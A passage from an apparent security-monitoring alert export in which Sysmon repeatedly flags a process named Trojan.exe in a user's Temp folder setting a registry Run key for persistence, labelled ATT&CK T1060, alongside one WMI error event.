..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:24.206352100Z"",""eventRecordID"":""1994"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:24.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:24.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:26.577",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:23.184 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:23.185239000Z"",""eventRecordID"":""1991"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:23.184\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:23.184"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:26.125",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4400; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT AvailableSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 24, 2020 @ 16:27:25.560",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:22.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:22.168829100Z"",""eventRecordID"":""1990"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:22.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:22.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:24.545",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:21.137 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:21.138338800Z"",""eventRecordID"":""1986"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:21.137\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:21.137"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:23.514",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:20.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:20.131555600Z"",""eventRecordID"":""1984"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:20.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:20.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:22.498",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:19.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:19.098827800Z"",""eventRecordID"":""1983"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:19.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:19.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:21.453",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:18.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:18.078667200Z"",""eventRecordID"":""1980"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:18.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:18.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:20.452",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:17.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:17.054226600Z"",""eventRecordID"":""1977"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:17.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:17.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:19.550",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:16.018 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:16.021275600Z"",""eventRecordID"":""1968"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:16.018\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:16.018"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:19.504",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:15.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:15.015789400Z"",""eventRecordID"":""1967"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:15.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:15.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:17.374",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:13.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:13.981765300Z"",""eventRecordID"":""1966"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:13.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:13.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:16.417",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:12.966 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John 